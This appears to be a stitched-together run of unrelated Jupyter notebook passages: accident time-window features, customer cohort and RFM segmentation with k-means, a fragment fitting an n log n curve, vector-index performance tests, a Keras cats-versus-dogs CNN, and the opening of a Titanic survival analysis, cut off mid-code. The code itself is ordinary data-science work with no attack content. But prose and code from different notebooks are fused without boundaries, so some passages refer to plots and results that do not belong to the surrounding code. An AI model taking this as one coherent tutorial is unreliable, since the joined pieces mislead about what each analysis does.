nulls in date_time column # Set this new date_time column to the index (for lag, ACF, PACF plots for trend and seasonality, and for the time series modeling for AR and RNN) df_accident = df_accident.set_index( "date_time") # Check info and make sure DatetimeIndex: 356445 entries, 2010-01-15 04:10:00 to 2020-12-24 09:25:00 df_accident.info() # Create a new column, which has the Day+hour with most accidents # Sun=1; Sat=7; # hour//3 for 3 hour window; # 3 hour window: 8 buckets of 3 hours each in a day; 7 days; buckets: 1 to 56 # 2 hour window: 12 buckets of 2 hours each in a day; 7 days; buckets: 1 to 84 # 4 hour window: 6 buckets of 4 hours each in a day; 7 days; buckets: 1 to 42 # Create columns for 3 hour window and its name (for graphs) # Create 2 or 4 hour windows too # 3 hour window df_accident["day_3hr_window"] = ((df_accident["day_week"]-1) * 8) + ( df_accident["hour"]//3) + 1 # starting from 1 df_accident["day_3hr_window_name"] = df_accident["day_weekname"] + " " + (( df_accident["hour"]//3)*3).astype(str) + ":00 to " + ((( df_accident["hour"]//3)*3)+3).astype(str) + ":00" # 2 hour window df_accident["day_2hr_window"] = ((df_accident["day_week"]-1) * 12) + ( df_accident["hour"]//2) + 1 # starting from 1 df_accident["day_2hr_window_name"] = df_accident["day_weekname"] + " " + (( df_accident["hour"]//2)*2).astype(str) + ":00 to " + ((( df_accident["hour"]//2)*2)+2).astype(str) + ":00" # 4 hour window df_accident["day_4hr_window"] = ((df_accident["day_week"]-1) * 6) + ( df_accident["hour"]//4) + 1 # starting from 1 df_accident["day_4hr_window_name"] = df_accident["day_weekname"] + " " + (( df_accident["hour"]//4)*4).astype(str) + ":00 to " + ((( df_accident["hour"]//4)*4)+4).astype(str) + ":00" df_accident[["day_week", "hour", "day_weekname", "day_2hr_window", "day_2hr_window_name", "day_3hr_window", "day_3hr_window_name", "day_4hr_window", "day_4hr_window_name"]] # Check looks good for Sunday since calcualtion check is easier df_accident[(df_accident['day_week'] == 1)][["day_week", "hour", "day_weekname", "day_2hr_window", "day_2hr_window_name", "day_3hr_window", "day_3hr_window_name", "day_4hr_window", "day_4hr_window_name"]].head() # Check looks good for all days df_accident[["day_week", "hour", "day_weekname", "day_2hr_window", "day_2hr_window_name", "day_3hr_window", "day_3hr_window_name", "day_4hr_window", "day_4hr_window_name"]].head() # Save the file (with date_time as index) for use in next notebook df_accident.to_csv("./data/accident_ts_10years.csv" )Customer Segmentation and Cohort Analysisimport numpy as np import pandas as pd data = pd.read_excel('/Users/khushal/Desktop/CustomerSegmentation/CSP3/Online-Retail.xlsx') data.head()Assigning a Daily Acquisition Cohortfrom datetime import datetime def get_month(x): return datetime(x.year,x.month,1) data['InvoiceMonth'] = data['InvoiceDate'].apply(get_month) grouping = data.groupby('CustomerID')['InvoiceMonth'] data['CohortMonth'] = grouping.transform('min') data.head()Extract Integer Values From Datadef get_date_int(df,column): year = df[column].dt.year month = df[column].dt.month day = df[column].dt.day return year,month,dayAssign Time Offset Valueinvoice_year,invoice_month, _ = get_date_int(data, 'InvoiceMonth') cohort_year, cohort_month, _ = get_date_int(data, 'CohortMonth') years_diff = invoice_year - cohort_year months_diff = invoice_month - cohort_month data['CohortIndex'] = years_diff * 12 + months_diff + 1 dataCount Monthly active customers from each cohortgrouping = data.groupby(['CohortMonth', 'CohortIndex']) # Count number of customers in each group by applying pandas nunique() function cohort_data = grouping['CustomerID'].apply(pd.Series.nunique) # Reset the index and create pandas pivot with CohortMonth cohort_data = cohort_data.reset_index() cohort_counts = cohort_data.pivot(index = 'CohortMonth', columns = 'CohortIndex', values = 'CustomerID') print(cohort_counts)CohortIndex 1.0 2.0 3.0 4.0 5.0 6.0 7.0 8.0 9.0 \ CohortMonth 2010-12-01 948.0 362.0 317.0 367.0 341.0 376.0 360.0 336.0 336.0 2011-01-01 421.0 101.0 119.0 102.0 138.0 126.0 110.0 108.0 131.0 2011-02-01 380.0 94.0 73.0 106.0 102.0 94.0 97.0 107.0 98.0 2011-03-01 440.0 84.0 112.0 96.0 102.0 78.0 116.0 105.0 127.0 2011-04-01 299.0 68.0 66.0 63.0 62.0 71.0 69.0 78.0 25.0 2011-05-01 279.0 66.0 48.0 48.0 60.0 68.0 74.0 29.0 NaN 2011-06-01 235.0 49.0 44.0 64.0 58.0 79.0 24.0 NaN NaN 2011-07-01 191.0 40.0 39.0 44.0 52.0 22.0 NaN NaN NaN 2011-08-01 167.0 42.0 42.0 42.0 23.0 NaN NaN NaN NaN 2011-09-01 298.0 89.0 97.0 36.0 NaN NaN NaN NaN NaN 2011-10-01 352.0 93.0 46.0 NaN NaN NaN NaN [...]Calculate Cohort Metrics We have assigned the cohorts and calculated the monthly offset for the metrics, now we will see how to calculate business metrics for these customer cohorts, We will start by using cohort counts table from above to calculate customer retention then we will calculate the average purchase quantity. The retention measures how many customers from each cohort have returned in the subsequent months. First Step : Select the First Column which is the total number of customers in the cohort Second Step: We will calculate the ratio of how many of these customers came back in the subsequent months which is the retention rate Note: You will see that the first month's retention - by defination will be 100% of all cohorts, This is because the number of active customers in the first month is actually the size of the cohort# Calculate Rentention Rate cohort_sizes = cohort_counts.iloc[:,0] retention = cohort_counts.divide(cohort_sizes, axis = 0) retention.round(3) * 100 # Calculate Average Quantity grouping = data.groupby(['CohortMonth', 'CohortIndex']) cohort_data = grouping['Quantity'].mean() cohort_data = cohort_data.reset_index() average_quantity = cohort_data.pivot(index = 'CohortMonth', columns = 'CohortIndex', values = 'Quantity') average_quantity.round(1)HeatMap for Visualizing Cohort Analysisretention.round(3) * 100 import seaborn as sns import matplotlib.pyplot as plt plt.figure(figsize=(10,8)) plt.title('Retentation Rates') sns.heatmap(data = retention, annot = True, fmt = '.0%', vmin = 0.0, vmax = 0.5, cmap = 'BuGn') plt.show() average_quantity.round(1) plt.figure(figsize=(8,6)) plt.title('Average Spend by Monthly Cohorts') sns.heatmap(data = average_quantity, annot = True, cmap = 'Blues')RFM Metrics RECENCY (R) - Which measures how recent was each customer's last purchase (Days since the last customer purchase) FREQUENCY (F) - Which measures how many purchases the customer has done in the last 12 months (Number of transactions in the last 12 months) MONETARY VALUE (M) - Which measures how much has the customer spent in the last 12 months (Total Spend in the last 12 months)data['TotalSum'] = data['UnitPrice'] * data['Quantity'] data.head() print ('Min:{};Max:{}'.format(min(data.InvoiceDate), max(data.InvoiceDate))) # Creating a hypothetical snapshot_day data, by adding one day to the max invoice date from datetime import datetime, date, time, timedelta snapshot_date = max(data.InvoiceDate) + timedelta(days = 1) snapshot_date # Aggregate date on a customer level datamart = data.groupby(['CustomerID']).agg({ 'InvoiceDate': lambda x : (snapshot_date - x.max()).days, 'InvoiceNo' : 'count', 'TotalSum' : 'sum'}) # Rename the columns for easier interpretation datamart.rename(columns = {'InvoiceDate' : 'Recency', 'InvoiceNo' : 'Frequency', 'TotalSum' : 'Monetary Value'}, inplace=True) datamart['Monetary Value'].round(1) datamart.head() # This will assign label to most recent customer as 4 and least recent customer as 1 r_labels = range(4,0,-1) r_quartiles = pd.qcut(datamart['Recency'], 4, labels = r_labels) datamart = datamart.assign(R = r_quartiles.values) datamart.head() # This will assign label to most frequent customer as 1 and least frequent customer as 4 # Also assign label most monetary value generating customer as 1 and least monetary value generating customer as 4 f_labels = range(1,5) m_labels = range(1,5) f_quartiles = pd.qcut(datamart['Frequency'], 4 , labels = f_labels) m_quartiles = pd.qcut(datamart['Monetary Value'], 4, labels = m_labels) datamart = datamart.assign(F = f_quartiles.values) datamart = datamart.assign(M = m_quartiles.values) datamart.head()Build RFM Segment and RFM Score 1. Concatenate RFM quartile values to RFM_Segment 2. Sum RFM quartiles values to RFM_Scoredatamart = datamart[['Recency','Frequency','Monetary Value', 'R','F','M']] def join_rfm(x): return str(x['R']) + str(x['F']) + str(x['M']) datamart['RFM_Segment'] = datamart.apply(join_rfm, axis = 1) datamart['RFM_Score'] = datamart[['R','F','M']].sum(axis = 1) datamart datamart.groupby('RFM_Segment').size().sort_values(ascending = False)[:10] datamart[datamart['RFM_Segment']=='111'].head(15) datamart.groupby('RFM_Score').agg( { 'Recency' : 'mean', 'Frequency': 'mean', 'Monetary Value' : ['mean','count'] } ).round(1)To Understand data better lets group them in named segmentsdef segment_me(df): if df['RFM_Score'] >= 9: return 'Gold' elif (df['RFM_Score'] >= 5) and (df['RFM_Score'] < 9): return 'Silver' else: return 'Bronze' datamart['General_Segment'] = datamart.apply(segment_me, axis = 1) datamart.groupby('General_Segment').agg( { 'Recency' : 'mean', 'Frequency' : 'mean', 'Monetary Value' : ['mean', 'count'] } ).round(1)Data Pre-processing for K-Means Clustering Exploring distribution of Recency and Frequencyimport seaborn as sns from matplotlib import pyplot as plt plt.subplot(2,1,1); sns.distplot(datamart['Recency']) plt.subplot(2,1,2); sns.distplot(datamart['Frequency']) plt.show()Data Transformations to manage Skewness### Logarithmic Transformation (Positive Values Only) import numpy as np frequency_log = np.log(datamart['Frequency']) sns.distplot(frequency_log) plt.show()NOTE Dealing with Negative Values 1. Adding a constant before log transformation 2. Cube Root transformationdatamart_rfm = datamart[['Recency','Frequency','Monetary Value','RFM_Score']] datamart_rfm.head() datamart_rfm.describe()Centering Variables with different means 1. K-means works well on variables with the same mean 2. Centering Variables is done by subracting average values from each observation.datamart_centered = datamart_rfm - datamart_rfm.mean() datamart_centered.describe().round(2)Scaling Variables with Different Variance 1. K-means works better on variables with the same variance and Standard Deviation. 2. Scaling variables is done by dividing them by standard deviation of each.# Scaling the Values datamart_scaled = datamart_rfm / datamart_rfm.std() datamart_scaled.describe().round(2)Combining Centering and Scaling 1. Subract mean and divide by standard deviation manually 2. Or use a scaler from scikit-learn library (returns numpy.ndarray object)### Using 2nd Method from sklearn.preprocessing import StandardScaler scaler = StandardScaler() scaler.fit(datamart_rfm) datamart_normalized = scaler.transform(datamart_rfm) datamart_normalized = pd.DataFrame(data=datamart_normalized, index=datamart_rfm.index, columns=datamart_rfm.columns) datamart_normalized.describe().round(2) # print ('mean:', datamart_normalized.mean(axis = 0).round(2)) # print ('std:' , datamart_normalized.std(axis = 0).round(2))Sequence of Structuring Pre-processing steps 1. Unskew the data -- Log Transformation 2. Standardize to the same average values 3. Scale to the separate standard deviation 4. Store as a separate array to be used for clustering Visualizing the Normalized Data# ## Unskew the data with log transformation # import numpy as np # datamart_log = np.log(datamart_rfm) # ## Normalize the variables with StandardScaler # from sklearn.preprocessing import StandardScaler # scaler = StandardScaler() # scaler.fit(datamart_log) # ## Store it separately for clustering # datamart_normalized = scaler.transform(datamart_log) # datamart_normalized = pd.DataFrame(data=datamart_normalized, index=datamart_rfm.index, columns=datamart_rfm.columns) # datamart_normalized.describe() plt.subplot(3,1,1); sns.distplot(datamart_normalized['Recency']) plt.subplot(3,1,2); sns.distplot(datamart_normalized['Frequency']) plt.subplot(3,1,3); sns.distplot(datamart_normalized['Monetary Value'])K- means Clustering Methods to define the number of clusters 1. Visual Methods - elbow criterion* Plot the number of clusters against within-cluster sum of squared errors (SSE) - Sum of Squared distances from every data point to their cluster center.* Identify the "elbow" in the plot* Elbow- a point representing an "optimal" number of clusters 2. Mathematical Methods - Silhouette Coefficient 3. Experimentation and Interpretation# Way to choose the number of clusters # Elbow Criterion Method from sklearn.cluster import KMeans import seaborn as sns from matplotlib import pyplot as plt # Fit KMeans and calculate SSE for each *k* sse = {} for k in range(1,11): kmeans = KMeans(n_clusters = k, random_state = 1) kmeans.fit(datamart_normalized) sse[k] = kmeans.inertia_ # Sum of Squared distances to closest cluster center # Plot SSE for each *k* plt.title('The Elbow Method') plt.xlabel('k');plt.ylabel('SSE') sns.pointplot(x=list(sse.keys()), y=list(sse.values())) plt.show()The Way to look at it is try to find the point with the largest angle which is so-called elbow, in the above graph the largest angle is at k = 4 Experimental Approach - analyze segments# 2-cluster approach # Import KMeans from sklearn library and initialize it as kmeans from sklearn.cluster import KMeans kmeans = KMeans(n_clusters = 2, random_state = 1) # Compute k-means clustering on pre-processed data kmeans.fit(datamart_normalized) # Extract cluster labels from labels_ attribute cluster_labels = kmeans.labels_ # Analyzing average RFM values of each cluster # Create a cluster label column in the original DataFrame datamart_rfm_k2 = datamart_rfm.assign(Cluster = cluster_labels) # Calculate average RFM values and size for each cluster datamart_rfm_k2.groupby(['Cluster']).agg({ 'Recency':'mean', 'Frequency' : 'mean', 'Monetary Value' : ['mean', 'count'] }).round(0)The results above is a simple table where we see how these two segments differ from each other, It's clear that segment 0 has customers who have not been very recent, are much less frequent with their purchases and their monetary value is much lower than that of segment 1.# 3 - Cluster Approach from sklearn.cluster import KMeans kmeans = KMeans(n_clusters = 3, random_state = 1) kmeans.fit(datamart_normalized) cluster_labels = kmeans.labels_ datamart_rfm_k3 = datamart_rfm.assign(Cluster = cluster_labels) datamart_rfm_k3.groupby(['Cluster']).agg({ 'Recency':'mean', 'Frequency':'mean', 'Monetary Value' : ['mean', 'count'] }).round(0)Profile and Interpret Segments Approach to build customer personas Summary statistics for each cluster e.g. average RFM values* We have already seen the approach where we assign the cluster label to the original dataset and then calculate average values of each cluster. Note: We have already this above in cell 48 and 49, as we can see there are some inherant differences between 2-segment and 3-segment solutions, while the former is simpler, the 3-segment solution gives more insights. Snake Plots (from Market Research)* Another approach is to use snake plots - a chart that visualizes RFM values between the segments.* Market Research technique to compare different segments.* Visual Representation of each segment attributes.* Need to first normalize data(center and scale).* Plot each cluster's average normalized values of each attribute on a line plot. Relative importance of cluster attributes compared to population# Preparing data for snake plot # Transform datamart_normalized as DataFrame and add a Cluster column datamart_normalized = pd.DataFrame(datamart_normalized, index = datamart_rfm.index, columns = datamart_rfm.columns) datamart_normalized['Cluster'] = datamart_rfm_k3['Cluster'] # Melt the data into a long format so RFM values and metric names are stored in 1 column each datamart_melt = pd.melt(datamart_normalized.reset_index(), id_vars = ['CustomerID', 'Cluster'], value_vars = ['Recency','Frequency', 'Monetary Value'], var_name = 'Attribute', value_name = 'Value') # Visualize the snake plot plt.title('Snake Plot of Standardized Variables') sns.lineplot(x='Attribute', y = 'Value', hue = 'Cluster', data = datamart_melt)Relative Importance of Segment Attributes* Useful technique to identify relative importance of each segment's attribute* Calculate average values of each clustercluster_avg = datamart_rfm_k3.groupby(['Cluster']).mean() population_avg = datamart_rfm.mean() relative_imp = cluster_avg / population_avg - 1 # Understanding the relative_imp using a heatmap plt.figure(figsize=(8,2)) plt.title('Relative Importance of Attributes') sns.heatmap(data = relative_imp, annot = True, fmt = '.2f', cmap = 'RdYlGn') plt.show()Analysis of above results* The further a ratio from 0, the more important that attribute is for a segment relative to the total population *************************************************** Project **************************************************** Implementation Summary of end-to-end segmentation solution Key Steps* Gather Data - You will use an updated data that has recency, frequency and monetary values from the previous lessons and an additional variable to make this more interesting.* Pre-process data the data to ensure k-means clustering works as expected.* Explore the data and decide on the number of clusters* Run k-means clustering.* Analyze and Visualize results We will not be using an additional dataset, this is taken from a different CSV file 'datamart_rfmt.csv' which is loaded below. New Dataset: Tenure, which means time since first transaction. It ultimately defines how long the customer has been with the company, since their first transaction.datamart_rfmt = pd.read_csv('/Users/khushal/Desktop/CustomerSegmentation/CSP3/datamart_rfmt.csv') datamart_rfmt.head()First Step -- Pre- Process the Data# Import StandardScaler from sklearn.preprocessing import StandardScaler # Apply log transformation datamart_rfmt_log = np.log(datamart_rfmt) # Initialize StandardScaler and fit it scaler = StandardScaler(); scaler.fit(datamart_rfmt_log) # Transform and store the scaled data as datamart_rfmt_normalized datamart_rfmt_normalized = scaler.transform(datamart_rfmt_log)Second Step: Calculate and plot sum of squared errors# Fit KMeans and calculate SSE for each k between 1 and 10 for k in range(1, 11): # Initialize KMeans with k clusters and fit it kmeans = KMeans(n_clusters= k , random_state=1).fit(datamart_rfmt_normalized) # Assign sum of squared distances to k element of the sse dictionary sse[k] = kmeans.inertia_ # Add the plot title, x and y axis labels plt.title('The Elbow Method'); plt.xlabel('k'); plt.ylabel('SSE') # Plot SSE values for each k stored as keys in the dictionary sns.pointplot(x=list(sse.keys()), y=list(sse.values())) plt.show()Third Step: Since the elbow is at 4 so , Build a 4-Cluster solution# Import KMeans from sklearn.cluster import KMeans # Initialize KMeans kmeans = KMeans(n_clusters = 4, random_state = 1) # Fit k-means clustering on the normalized data set kmeans.fit(datamart_rfmt_normalized) # Extract cluster labels cluster_labels = kmeans.labels_Fourth Step : Analyze the Segments# Create a new DataFrame by adding a cluster label column to datamart_rfmt datamart_rfmt_k4 = datamart_rfmt.assign(Cluster= cluster_labels) # Group by cluster grouped = datamart_rfmt_k4.groupby(['Cluster']) # Calculate average RFMT values and segment sizes for each cluster grouped.agg({ 'Recency': 'mean', 'Frequency': 'mean', 'MonetaryValue': 'mean', 'Tenure': ['mean', 'count'] }).round(1)The above line fits quite well for the **middle part** of the scatter plot, however notice the **begenning (n: 0 - 10k)** and the **ending (n: 40k - 50k)**,both the sections look to be falling away from the pridected line, this suggests that the plot is not exactly a straight line (number of pairs required to form 1 component is **not linearly proportional** to input size).# lets try to fit it with a linearithmic plot (n lg n) # pair_count_exp = np.copy(pair_count_arr) # tuning intercept and coefficient manually to fit the curve with scatter plot intercept = 950 coefficient = 0.065 pair_count_exp = coefficient * pair_count_arr * np.log2(pair_count_arr) + intercept # plotting the predicted scatter_plot(pair_count_exp)교육까지 끝난 상태에서 피클로 저장autompg_lr = pickle.load(open('./saves/autompg_lr.pkl','rb')) autompg_lr type(autompg_lr) autompg_lr.predict([[3504.0,8]])Performance Tests%load_ext autoreload %autoreload 2 import time import matplotlib.pyplot as plt import numpy as np from interactive_index import InteractiveIndexLoad LVIS Embeddingsembeddings = np.load("lvis-embeddings.npy", allow_pickle=True).item() image_fnames = list(embeddings.keys()) res1024_embs = np.array([embeddings[img]['res4'] for img in image_fnames]).squeeze() res2048_embs = np.array([embeddings[img]['res5'] for img in image_fnames]).squeeze() assert res1024_embs.shape == (len(image_fnames), 1024) assert res2048_embs.shape == (len(image_fnames), 2048)Create Two IndexesWe're going to need to be creating these indexes a lot, so let's write a convenience function for it.def create_indexes(d0=1024, d1=2048, n_centroids=512, vectors_per_index=len(image_fnames) // 8): index0 = InteractiveIndex( d=d0, n_centroids=n_centroids, vectors_per_index=vectors_per_index, tempdir='/tmp/idx0' ) index1 = InteractiveIndex( d=d1, n_centroids=n_centroids, vectors_per_index=vectors_per_index, tempdir='/tmp/idx1' ) return index0, index1Speedup vs. Accuracy Varying Number of Probesindex_1024, index_2048 = create_indexes()Train the indexesn_train = 20_000 start = time.time() index_1024.train(res1024_embs[:n_train]) end = time.time() print(f'Training index_1024 on {n_train} vectors for {index_1024.n_centroids} clusters took {end - start:.3} seconds') start = time.time() index_2048.train(res2048_embs[:n_train]) end = time.time() print(f'Training index_2048 on {n_train} vectors for {index_2048.n_centroids} clusters took {end - start:.3} seconds')Training index_1024 on 20000 vectors for 512 clusters took 0.945 seconds Training index_2048 on 20000 vectors for 512 clusters took 1.65 secondsAdd all vectorsTo be within the memory space of our gpu, let's add in batches of vectors_per_index.inc = 2 * index_1024.vectors_per_index for i in range(len(image_fnames) // inc): start = time.time() index_1024.add(res1024_embs[i * inc:(i + 1) * inc]) end = time.time() print(f'Adding {inc}, 1024-D vectors to index_1024 with {index_1024.n_centroids} clusters took {end - start:.3} seconds') for i in range(len(image_fnames) // inc): start = time.time() index_2048.add(res2048_embs[i * inc:(i + 1) * inc]) end = time.time() print(f'Adding {inc}, 2048-D vectors to index_2048 with {index_2048.n_centroids} clusters took {end - start:.3} seconds') # merge the partial indexes before searching start = time.time() index_1024.merge_partial_indexes() end = time.time() print(f'd=1024: Merging {index_1024.n_indexes} partial indexes with {index_1024.n_vectors} vectors took {end - start:.3} seconds') start = time.time() index_2048.merge_partial_indexes() end = time.time() print(f'd=2048: Merging {index_2048.n_indexes} partial indexes with {index_2048.n_vectors} vectors took {end - start:.3} seconds')d=1024: Merging 8 partial indexes with 163688 vectors took 0.367 seconds d=2048: Merging 8 partial indexes with 163688 vectors took 1.03 secondsGet Ground-Truth for AccuracySince all the vectors are stored in full for these indexes, we can get the precise nearest neighbors by setting `n_probes` to the number of clusters.# Pick 50 random embeddings n_xq = 50 xq_1024 = res1024_embs[np.random.choice(np.arange(res1024_embs.shape[0]), n_xq)] xq_2048 = res2048_embs[np.random.choice(np.arange(res2048_embs.shape[0]), n_xq)] # Get the 100 nearest neighbors k = 100 start = time.time() dists_1024, inds_1024 = index_1024.query(xq_1024, k=k, n_probes=index_1024.n_centroids) end = time.time() print(f'd=1024: Querying the {k} nearest neighbors of {n_xq} points across all centroids took {end - start:.3} seconds') start = time.time() dists_2048, inds_2048 = index_2048.query(xq_2048, k=k, n_probes=index_2048.n_centroids) end = time.time() print(f'd=2048: Querying the {k} nearest neighbors of {n_xq} points across all centroids took {end - start:.3} seconds') max_n_probes = index_1024.n_centroids times_1024 = np.empty(max_n_probes//4) avg_recall_pct_1024 = np.empty(max_n_probes//4) avg_dist_1024 = np.empty(max_n_probes//4) for n_probes in range(max_n_probes, 0, -4): start = time.time() dists, inds = index_1024.query(xq_1024, k=k, n_probes=n_probes) end = time.time() print(f'n_probes={n_probes}: {end-start:.3} seconds') times_1024[n_probes//4 - 1] = end - start avg_dist_1024[n_probes//4 - 1] = dists.mean() recall_pcts = 0 for i in range(len(inds)): recall_pcts += len(set(inds[i]) & set(inds_1024[i])) / k avg_recall_pct_1024[n_probes//4 - 1] = recall_pcts / len(inds) max_n_probes = index_2048.n_centroids times_2048 = np.empty(max_n_probes//4) avg_recall_pct_2048 = np.empty(max_n_probes//4) avg_dist_2048 = np.empty(max_n_probes//4) for n_probes in range(max_n_probes, 0, -4): start = time.time() dists, inds = index_2048.query(xq_2048, k=k, n_probes=n_probes) end = time.time() print(f'n_probes={n_probes}: {end-start:.3} seconds') times_2048[n_probes//4 - 1] = end - start avg_dist_2048[n_probes//4 - 1] = dists.mean() recall_pcts = 0 for i in range(len(inds)): recall_pcts += len(set(inds[i]) & set(inds_2048[i])) / k avg_recall_pct_2048[n_probes//4 - 1] = recall_pcts / len(inds) plt.plot((np.arange(len(times_1024)) + 1) * 4, times_1024[-1] / times_1024, label='1024-D') plt.plot((np.arange(len(times_2048)) + 1) * 4, times_2048[-1] / times_2048, label='2048-D') plt.legend() plt.ylabel('Speedup over full search') plt.xlabel('Number of probes') plt.title('Speedup vs. Number of Probes') plt.show() plt.plot(avg_recall_pct_1024, times_1024[-1] / times_1024, label='1024-D') plt.plot(avg_recall_pct_2048, times_2048[-1] / times_2048, label='2048-D') plt.legend() plt.ylabel('Speedup over full search') plt.xlabel('Average recall percentage') plt.title('Speedup vs. Average Recall Percentage') plt.show() plt.plot(np.sqrt(avg_dist_1024 / avg_dist_1024[-1]), times_1024[-1] / times_1024, label='1024-D') plt.plot(np.sqrt(avg_dist_2048 / avg_dist_2048[-1]), times_2048[-1] / times_2048, label='2048-D') plt.legend() plt.ylabel('Speedup over full search') plt.xlabel('Increase in average distance of results') plt.title('Speedup vs. Percentage Increase of Average Distance') plt.show() start = time.time() dists, inds = index_1024.query(xq_1024[0], k=100, n_probes=512) end = time.time() print(end-start)0.3320941925048828A CNN classifier for dogs and cats datasetThe problem is to classify a given image to dog or cat image. A simple convolutional neural network can be built with convolution layers, max pool layers and dense layers using Theano, Tensorflow and Keras frameworks. As of today, the architecture of CNN models have evolved to complex networks with lot of convolution layers, dense layers, pooling layers, dropout layers, combined together to achieve high accuracy and to solve complex image classification problems.from keras.models import Sequential from keras.layers import Conv2D from keras.layers import Flatten from keras.layers import Dense from keras.layers import MaxPooling2D imgclassifier = Sequential() imgclassifier.add(Conv2D(64, (3, 3), input_shape = (64, 64, 3), activation = 'relu')) imgclassifier.add(MaxPooling2D(pool_size = (2, 2))) imgclassifier.add(Conv2D(32, (3, 3), activation = 'relu')) imgclassifier.add(MaxPooling2D(pool_size = (2, 2))) imgclassifier.add(Conv2D(32, (3, 3), activation = 'relu')) imgclassifier.add(MaxPooling2D(pool_size = (2, 2))) imgclassifier.add(Flatten()) imgclassifier.add(Dense(units = 128, activation = 'relu')) imgclassifier.add(Dense(units = 64, activation = 'relu')) imgclassifier.add(Dense(units = 1, activation = 'sigmoid')) imgclassifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy']) from keras.preprocessing.image import ImageDataGenerator trainDataGenerator = ImageDataGenerator( rescale=1./255, shear_range=0.2, zoom_range=0.2, horizontal_flip=True) testDataGenerator = ImageDataGenerator(rescale=1./255)W0827 16:11:55.352031 139878987798336 deprecation_wrapper.py:119] From /home/chandru4ni/python-environments/qc/local/lib/python3.6/site-packages/keras/optimizers.py:790: The name tf.train.Optimizer is deprecated. Please use tf.compat.v1.train.Optimizer instead. W0827 16:11:55.403251 139878987798336 deprecation_wrapper.py:119] From /home/chandru4ni/python-environments/qc/local/lib/python3.6/site-packages/keras/backend/tensorflow_backend.py:3376: The name tf.log is deprecated. Please use tf.math.log instead. W0827 16:11:55.416798 139878987798336 deprecation.py:323] From /home/chandru4ni/python-environments/qc/local/lib/python3.6/site-packages/tensorflow/python/ops/nn_impl.py:180: add_dispatch_support..wrapper (from tensorflow.python.ops.array_ops) is deprecated and will be removed in a future version. Instructions for updating: Use tf.where in 2.0, which has the same broadcast rule as np.whereThe dataset of dogs and cats can be downloaded from https://www.kaggle.com/c/dogs-vs-cats/dataThe training data needs to be stored in trainingSet folder and test data in testSet foldertrainingSet = trainDataGenerator.flow_from_directory('trainingSet', target_size=(64, 64), batch_size=32, class_mode='binary') testSet = testDataGenerator.flow_from_directory('testSet', target_size=(64, 64), batch_size=32, class_mode='binary') imgclassifier.fit_generator(trainingSet, samples_per_epoch=8000, nb_epoch=5, validation_data=testSet, nb_val_samples=2000) import numpy as np from keras.preprocessing import image test_new_image = image.load_img('new_input.jpg', target_size=(64, 64)) test_new_image = image.img_to_array(test_new_image) test_new_image = np.expand_dims(test_new_image, axis = 0) result = imgclassifier.predict(test_new_image) trainingSet.class_indices if result[0][0] == 1: prediction = 'dog' else: prediction = 'cat' prediction![](http://i67.tinypic.com/2jcbwcw.png) Titanic Survival Analysis **Authors:** Several public Kaggle Kernels, edits by & Install xgboost package in your pyhton enviroment:try:```$ conda install py-xgboost```# You can also install the package by running the line below # directly in your notebook #!conda install py-xgboost --y # No warnings import warnings warnings.filterwarnings('ignore') # Filter out warnings # data analysis and wrangling import pandas as pd import numpy as np import random as rnd # visualization import seaborn as sns import matplotlib.pyplot as plt %matplotlib inline # machine learning from sklearn.linear_model import LogisticRegression from sklearn.svm import SVC, LinearSVC from sklearn.ensemble import RandomForestClassifier from sklearn.neighbors import KNeighborsClassifier from sklearn.naive_bayes import GaussianNB # Gaussian Naive Bays from sklearn.linear_model import Perceptron from sklearn.linear_model import SGDClassifier #stochastic gradient descent from sklearn.tree import DecisionTreeClassifier import xgboost as xgb # Plot styling sns.set(style='white', context='notebook', palette='deep') plt.rcParams[ 'figure.figsize' ] = 9 , 5 # Special distribution plot (will be used later) def plot_distribution( df , var , target , **kwargs ): row = kwargs.get( 'row' , None ) col = kwargs.get( 'col' , None ) facet = sns.FacetGrid( df , hue=target , aspect=4 , row = row , col = col ) facet.map( sns.kdeplot , var , shade= True ) facet.set( xlim=( 0 , df[ var ].max() ) ) facet.add_legend() plt.tight_layout()References to material we won't cover in detail:* **Gradient Boosting:** http://blog.kaggle.com/2017/01/23/a-kaggle-master-explains-gradient-boosting/* **Naive Bayes:** http://scikit-learn.org/stable/modules/naive_bayes.html* **Perceptron:** http://aass.oru.se/~lilien/ml/seminars/2007_02_01b-Janecek-Perceptron.pdf Input Datatrain_df = pd.read_csv('train.csv') test_df = pd.read_csv('test.csv') combine = [train_df, test_df] # when we change train_df or test_df the objects in combine will also change # (combine is only a pointer to the objects) # combine is used to ensure whatever preprocessing is done # on training data is also done on test dataAnalyze Data:print(train_df.columns.values) # seem to agree with the variable definitions above # preview the data train_df.head() train_df.describe()Comment on the Data`PassengerId` does not contain any valuable information. `Survived, Passenger Class, Age Siblings Spouses, Parents Children` and `Fare` are numerical values -- so we don't need to transform them, but we might want to group them (i.e. create categorical variables). `Sex, Embarked` are categorical features that we need to map to integer values. `Name, Ticket` and `Cabin` might also contain valuable information. Preprocessing Data# check dimensions of the train and test datasets print("Shapes Before: (train) (test) = ", train_df.shape, test_df.shape) print() # Drop columns 'Ticket', 'Cabin', need to do it for both test and training train_df = train_df.drop(['Ticket', 'Cabin'], axis=1) test_df = test_df.drop(['Ticket', 'Cabin'], axis=1) combine = [train_df, test_df] print("Shapes After: (train) (test) =", train_df.shape, test_df.shape) # Check if there are null values in the datasets print(train_df.isnull().sum()) print() print(test_df.isnull().sum()) # from the Name column we will extract title of each passenger # and save that in a column in the datasets called 'Title' # if you want to match Titles or names with any other expression # refer to this tutorial on regex in python: # https://www.tutorialspoint.com/python/python_reg_expressions.htm for dataset in combine: dataset['Title'] = dataset.Name.str.extract(' ([A-Za-z]+)\.', expand=False) # We will check the count of different titles across the training and test dataset pd.crosstab(train_df['Title'], train_df['Sex']) # same for test pd.crosstab(test_df['Title'], test_df['Sex']) # We see common titles like Miss, Mrs, Mr,Master are dominant, we will # correct some Titles to standard forms and replace the rarest titles # with single name 'Rare' for dataset in combine: dataset['Title'] = dataset['Title'].replace(['Lady', 'Countess','Capt', 'Col',\ 'Don', 'Dr', 'Major', 'Rev', 'Sir', 'Jonkheer', 'Dona'], 'Rare') dataset['Title'] = dataset['Title'].replace('Mlle', 'Miss') #Mademoiselle dataset['Title'] = dataset['Title'].replace('Ms', 'Miss') dataset['Title'] = dataset['Title'].replace('Mme', 'Mrs') #Madame train_df[['Title', 'Survived']].groupby(['Title']).mean() # Survival chance for each title sns.countplot(x='Survived', hue="Title", data=train_df, order=[1,0]); # Map title string values to numbers so that we can make predictions title_mapping = {"Mr": 1, "Miss": 2, "Mrs": 3, "Master": 4, "Rare": 5} for dataset in combine: dataset['Title'] = 